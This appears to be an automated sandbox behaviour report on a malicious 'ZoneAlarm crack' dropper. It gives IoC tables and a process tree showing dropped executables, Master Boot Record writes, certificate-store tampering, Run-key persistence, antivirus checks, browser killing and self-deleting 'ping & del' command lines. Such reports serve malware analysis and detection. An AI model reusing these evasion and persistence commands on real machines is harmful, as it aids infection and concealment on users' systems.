HTTP User-Agent header	195	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	441	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	456	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1159	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1167	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1212	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1217	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2628	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1199	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1223	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1640	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1669	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2504	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	513	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1156	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1637	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1670	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1735	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	198	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	210	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	416	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2509	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	174	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	420	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	457	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1198	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1655	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1692	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1741	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2070	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	208	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1746	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	128	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	498	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1208	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1218	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1672	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1732	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	507	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	508	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1183	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1630	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1743	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	173	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

key.exe1615157397877.exe1615157399502.exemultitimer.exefile.exe

pid	process
1128	key.exe
1128	key.exe
4512	1615157397877.exe
4512	1615157397877.exe
4644	1615157399502.exe
4644	1615157399502.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
2632	file.exe
2632	file.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
2632	file.exe
2632	file.exe
2632	file.exe
2632	file.exe
2632	file.exe
2632	file.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe
3068	multitimer.exe

Suspicious behavior: LoadsDriver 3 IoCs

Processes:

app.exe

pid process

5492 app.exe
616
616

pid	process
5492	app.exe
616
616

Suspicious behavior: MapViewOfSection 21 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

pid	process
6980	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	736	msiexec.exe
Token: SeIncreaseQuotaPrivilege	736	msiexec.exe
Token: SeSecurityPrivilege	208	msiexec.exe
Token: SeCreateTokenPrivilege	736	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	736	msiexec.exe
Token: SeLockMemoryPrivilege	736	msiexec.exe
Token: SeIncreaseQuotaPrivilege	736	msiexec.exe
Token: SeMachineAccountPrivilege	736	msiexec.exe
Token: SeTcbPrivilege	736	msiexec.exe
Token: SeSecurityPrivilege	736	msiexec.exe
Token: SeTakeOwnershipPrivilege	736	msiexec.exe
Token: SeLoadDriverPrivilege	736	msiexec.exe
Token: SeSystemProfilePrivilege	736	msiexec.exe
Token: SeSystemtimePrivilege	736	msiexec.exe
Token: SeProfSingleProcessPrivilege	736	msiexec.exe
Token: SeIncBasePriorityPrivilege	736	msiexec.exe
Token: SeCreatePagefilePrivilege	736	msiexec.exe
Token: SeCreatePermanentPrivilege	736	msiexec.exe
Token: SeBackupPrivilege	736	msiexec.exe
Token: SeRestorePrivilege	736	msiexec.exe
Token: SeShutdownPrivilege	736	msiexec.exe
Token: SeDebugPrivilege	736	msiexec.exe
Token: SeAuditPrivilege	736	msiexec.exe
Token: SeSystemEnvironmentPrivilege	736	msiexec.exe
Token: SeChangeNotifyPrivilege	736	msiexec.exe
Token: SeRemoteShutdownPrivilege	736	msiexec.exe
Token: SeUndockPrivilege	736	msiexec.exe
Token: SeSyncAgentPrivilege	736	msiexec.exe
Token: SeEnableDelegationPrivilege	736	msiexec.exe
Token: SeManageVolumePrivilege	736	msiexec.exe
Token: SeImpersonatePrivilege	736	msiexec.exe
Token: SeCreateGlobalPrivilege	736	msiexec.exe
Token: SeCreateTokenPrivilege	736	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	736	msiexec.exe
Token: SeLockMemoryPrivilege	736	msiexec.exe
Token: SeIncreaseQuotaPrivilege	736	msiexec.exe
Token: SeMachineAccountPrivilege	736	msiexec.exe
Token: SeTcbPrivilege	736	msiexec.exe
Token: SeSecurityPrivilege	736	msiexec.exe
Token: SeTakeOwnershipPrivilege	736	msiexec.exe
Token: SeLoadDriverPrivilege	736	msiexec.exe
Token: SeSystemProfilePrivilege	736	msiexec.exe
Token: SeSystemtimePrivilege	736	msiexec.exe
Token: SeProfSingleProcessPrivilege	736	msiexec.exe
Token: SeIncBasePriorityPrivilege	736	msiexec.exe
Token: SeCreatePagefilePrivilege	736	msiexec.exe
Token: SeCreatePermanentPrivilege	736	msiexec.exe
Token: SeBackupPrivilege	736	msiexec.exe
Token: SeRestorePrivilege	736	msiexec.exe
Token: SeShutdownPrivilege	736	msiexec.exe
Token: SeDebugPrivilege	736	msiexec.exe
Token: SeAuditPrivilege	736	msiexec.exe
Token: SeSystemEnvironmentPrivilege	736	msiexec.exe
Token: SeChangeNotifyPrivilege	736	msiexec.exe
Token: SeRemoteShutdownPrivilege	736	msiexec.exe
Token: SeUndockPrivilege	736	msiexec.exe
Token: SeSyncAgentPrivilege	736	msiexec.exe
Token: SeEnableDelegationPrivilege	736	msiexec.exe
Token: SeManageVolumePrivilege	736	msiexec.exe
Token: SeImpersonatePrivilege	736	msiexec.exe
Token: SeCreateGlobalPrivilege	736	msiexec.exe
Token: SeCreateTokenPrivilege	736	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	736	msiexec.exe
Token: SeLockMemoryPrivilege	736	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msiexec.exeSetup3310.tmp2r2utnbvoam.tmpchashepro3.tmpIBInstaller_97039.tmpvict.tmpvpn.tmp

pid	process
736	msiexec.exe
4992	Setup3310.tmp
4712	2r2utnbvoam.tmp
5064	chashepro3.tmp
4184	IBInstaller_97039.tmp
5004	vict.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp
4136	vpn.tmp

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exefirefox.exe1615157397877.exefirefox.exe1615157399502.exe2r2utnbvoam.exe2r2utnbvoam.tmpvict.exeSetup3310.exeaskinstall24.exechashepro3.exeSetup3310.tmpvict.tmpvpn.exechashepro3.tmpvpn.tmpIBInstaller_97039.exewinlthst.exeIBInstaller_97039.tmpBrava.exe8.exeapp.exewimapi.exechrome_proxy.exeThunderFW.exeSetup.exeSetup.tmpfnoy3fxu0qu.exefnoy3fxu0qu.tmptapinstall.exeMicrosoftEdge.exeProPlugin.exeProPlugin.tmpMicrosoftEdgeCP.exe7za.exeSetup.exechrome.exeDelta.exeDelta.tmpSetup.exezznote.exezznote.tmptapinstall.exejg4_4jaa.exehjjgaa.exejfiag3g_gg.exeparse.exeparse.exe7za.exeparse.exejfiag3g_gg.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemask_svc.exemask_svc.exeFai.comFai.comMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
1744	Setup.exe
1124	AD754B4D3FE2C4EE.exe
2288	AD754B4D3FE2C4EE.exe
4316	firefox.exe
4512	1615157397877.exe
4624	firefox.exe
4644	1615157399502.exe
4680	2r2utnbvoam.exe
4712	2r2utnbvoam.tmp
4576	vict.exe
4580	Setup3310.exe
4716	askinstall24.exe
4832	chashepro3.exe
4992	Setup3310.tmp
5004	vict.tmp
5024	vpn.exe
5064	chashepro3.tmp
4136	vpn.tmp
1944	IBInstaller_97039.exe
4132	winlthst.exe
4184	IBInstaller_97039.tmp
1580	Brava.exe
4256	8.exe
2020	app.exe
4852	wimapi.exe
4960	chrome_proxy.exe
4592	ThunderFW.exe
5548	Setup.exe
5672	Setup.tmp
5776	fnoy3fxu0qu.exe
5872	fnoy3fxu0qu.tmp
4760	tapinstall.exe
1000	MicrosoftEdge.exe
6268	ProPlugin.exe
6324	ProPlugin.tmp
6980	MicrosoftEdgeCP.exe
6404	7za.exe
6464	Setup.exe
6632	chrome.exe
5720	Delta.exe
4408	Delta.tmp
6980	MicrosoftEdgeCP.exe
5364	Setup.exe
4988	zznote.exe
5304	zznote.tmp
6368	tapinstall.exe
6968	jg4_4jaa.exe
6360	hjjgaa.exe
2964	jfiag3g_gg.exe
7196	parse.exe
7268	parse.exe
7328	7za.exe
7392	parse.exe
8004	jfiag3g_gg.exe
4608	MicrosoftEdge.exe
7284	MicrosoftEdgeCP.exe
7284	MicrosoftEdgeCP.exe
7404	mask_svc.exe
7204	mask_svc.exe
5316	Fai.com
4232	Fai.com
6456	MicrosoftEdge.exe
7428	MicrosoftEdgeCP.exe
7428	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Zonealarm.extreme.security.201.crack.by.CORE.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exeSetup.exemsiexec.execmd.exeAD754B4D3FE2C4EE.exe

description	pid	process	target process
PID 1152 wrote to memory of 1652	1152	Zonealarm.extreme.security.201.crack.by.CORE.exe	cmd.exe
PID 1152 wrote to memory of 1652	1152	Zonealarm.extreme.security.201.crack.by.CORE.exe	cmd.exe
PID 1152 wrote to memory of 1652	1152	Zonealarm.extreme.security.201.crack.by.CORE.exe	cmd.exe
PID 1652 wrote to memory of 744	1652	cmd.exe	keygen-pr.exe
PID 1652 wrote to memory of 744	1652	cmd.exe	keygen-pr.exe
PID 1652 wrote to memory of 744	1652	cmd.exe	keygen-pr.exe
PID 1652 wrote to memory of 684	1652	cmd.exe	keygen-step-1.exe
PID 1652 wrote to memory of 684	1652	cmd.exe	keygen-step-1.exe
PID 1652 wrote to memory of 684	1652	cmd.exe	keygen-step-1.exe
PID 1652 wrote to memory of 2788	1652	cmd.exe	keygen-step-3.exe
PID 1652 wrote to memory of 2788	1652	cmd.exe	keygen-step-3.exe
PID 1652 wrote to memory of 2788	1652	cmd.exe	keygen-step-3.exe
PID 1652 wrote to memory of 2664	1652	cmd.exe	keygen-step-4.exe
PID 1652 wrote to memory of 2664	1652	cmd.exe	keygen-step-4.exe
PID 1652 wrote to memory of 2664	1652	cmd.exe	keygen-step-4.exe
PID 744 wrote to memory of 1128	744	keygen-pr.exe	key.exe
PID 744 wrote to memory of 1128	744	keygen-pr.exe	key.exe
PID 744 wrote to memory of 1128	744	keygen-pr.exe	key.exe
PID 2664 wrote to memory of 1744	2664	keygen-step-4.exe	Setup.exe
PID 2664 wrote to memory of 1744	2664	keygen-step-4.exe	Setup.exe
PID 2664 wrote to memory of 1744	2664	keygen-step-4.exe	Setup.exe
PID 2788 wrote to memory of 3780	2788	keygen-step-3.exe	cmd.exe
PID 2788 wrote to memory of 3780	2788	keygen-step-3.exe	cmd.exe
PID 2788 wrote to memory of 3780	2788	keygen-step-3.exe	cmd.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 1128 wrote to memory of 2736	1128	key.exe	key.exe
PID 3780 wrote to memory of 3904	3780	cmd.exe	PING.EXE
PID 3780 wrote to memory of 3904	3780	cmd.exe	PING.EXE
PID 3780 wrote to memory of 3904	3780	cmd.exe	PING.EXE
PID 1744 wrote to memory of 736	1744	Setup.exe	msiexec.exe
PID 1744 wrote to memory of 736	1744	Setup.exe	msiexec.exe
PID 1744 wrote to memory of 736	1744	Setup.exe	msiexec.exe
PID 1744 wrote to memory of 1124	1744	Setup.exe	AD754B4D3FE2C4EE.exe
PID 1744 wrote to memory of 1124	1744	Setup.exe	AD754B4D3FE2C4EE.exe
PID 1744 wrote to memory of 1124	1744	Setup.exe	AD754B4D3FE2C4EE.exe
PID 1744 wrote to memory of 2288	1744	Setup.exe	AD754B4D3FE2C4EE.exe
PID 1744 wrote to memory of 2288	1744	Setup.exe	AD754B4D3FE2C4EE.exe
PID 1744 wrote to memory of 2288	1744	Setup.exe	AD754B4D3FE2C4EE.exe
PID 1744 wrote to memory of 2792	1744	Setup.exe	cmd.exe
PID 1744 wrote to memory of 2792	1744	Setup.exe	cmd.exe
PID 1744 wrote to memory of 2792	1744	Setup.exe	cmd.exe
PID 2664 wrote to memory of 2200	2664	keygen-step-4.exe	askinstall20.exe
PID 2664 wrote to memory of 2200	2664	keygen-step-4.exe	askinstall20.exe
PID 2664 wrote to memory of 2200	2664	keygen-step-4.exe	askinstall20.exe
PID 208 wrote to memory of 2084	208	msiexec.exe	MsiExec.exe
PID 208 wrote to memory of 2084	208	msiexec.exe	MsiExec.exe
PID 208 wrote to memory of 2084	208	msiexec.exe	MsiExec.exe
PID 2792 wrote to memory of 4164	2792	cmd.exe	PING.EXE
PID 2792 wrote to memory of 4164	2792	cmd.exe	PING.EXE
PID 2792 wrote to memory of 4164	2792	cmd.exe	PING.EXE
PID 2288 wrote to memory of 4304	2288	AD754B4D3FE2C4EE.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Zonealarm.extreme.security.201.crack.by.CORE.exe
"C:\Users\Admin\AppData\Local\Temp\Zonealarm.extreme.security.201.crack.by.CORE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1652

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1128

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:2736

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:684

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3780

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:3904

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2664

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:736

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:1124

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4316

C:\Users\Admin\AppData\Roaming\1615157397877.exe
"C:\Users\Admin\AppData\Roaming\1615157397877.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615157397877.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4512

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4624

C:\Users\Admin\AppData\Roaming\1615157399502.exe
"C:\Users\Admin\AppData\Roaming\1615157399502.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615157399502.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4644

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4592

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
6⤵
PID:6032

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:6120

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:4304

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4420

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
6⤵
PID:4540

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:4584

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4164

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2200

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4384

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4460

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
4⤵
- Executes dropped EXE
PID:4684

C:\Users\Admin\AppData\Local\Temp\714DAPD36Q\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\714DAPD36Q\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4784

C:\Users\Admin\AppData\Local\Temp\714DAPD36Q\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\714DAPD36Q\multitimer.exe" 1 3.1615157622.604559767c3ad 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4388

C:\Users\Admin\AppData\Local\Temp\714DAPD36Q\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\714DAPD36Q\multitimer.exe" 2 3.1615157622.604559767c3ad
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3068

C:\Users\Admin\AppData\Local\Temp\sbit1dvsv13\2r2utnbvoam.exe
"C:\Users\Admin\AppData\Local\Temp\sbit1dvsv13\2r2utnbvoam.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4680

C:\Users\Admin\AppData\Local\Temp\is-BVA7D.tmp\2r2utnbvoam.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BVA7D.tmp\2r2utnbvoam.tmp" /SL5="$90050,870426,780800,C:\Users\Admin\AppData\Local\Temp\sbit1dvsv13\2r2utnbvoam.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4712

C:\Users\Admin\AppData\Local\Temp\is-7JKO2.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-7JKO2.tmp\winlthst.exe" test1 test1
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4132

C:\Users\Admin\AppData\Local\Temp\0dt4jis3ozp\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\0dt4jis3ozp\askinstall24.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4716

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4364

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:5448

C:\Users\Admin\AppData\Local\Temp\bgte2zh4xt0\sroql3gh1oa.exe
"C:\Users\Admin\AppData\Local\Temp\bgte2zh4xt0\sroql3gh1oa.exe" 57a764d042bf8
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\S1FQC487SD\S1FQC487S.exe" 57a764d042bf8 & exit
9⤵
PID:5700

C:\Program Files\S1FQC487SD\S1FQC487S.exe
"C:\Program Files\S1FQC487SD\S1FQC487S.exe" 57a764d042bf8
10⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:5940

C:\Users\Admin\AppData\Local\Temp\qk4gvzqjlir\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\qk4gvzqjlir\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5024

C:\Users\Admin\AppData\Local\Temp\is-GE8TE.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GE8TE.tmp\vpn.tmp" /SL5="$10286,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qk4gvzqjlir\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
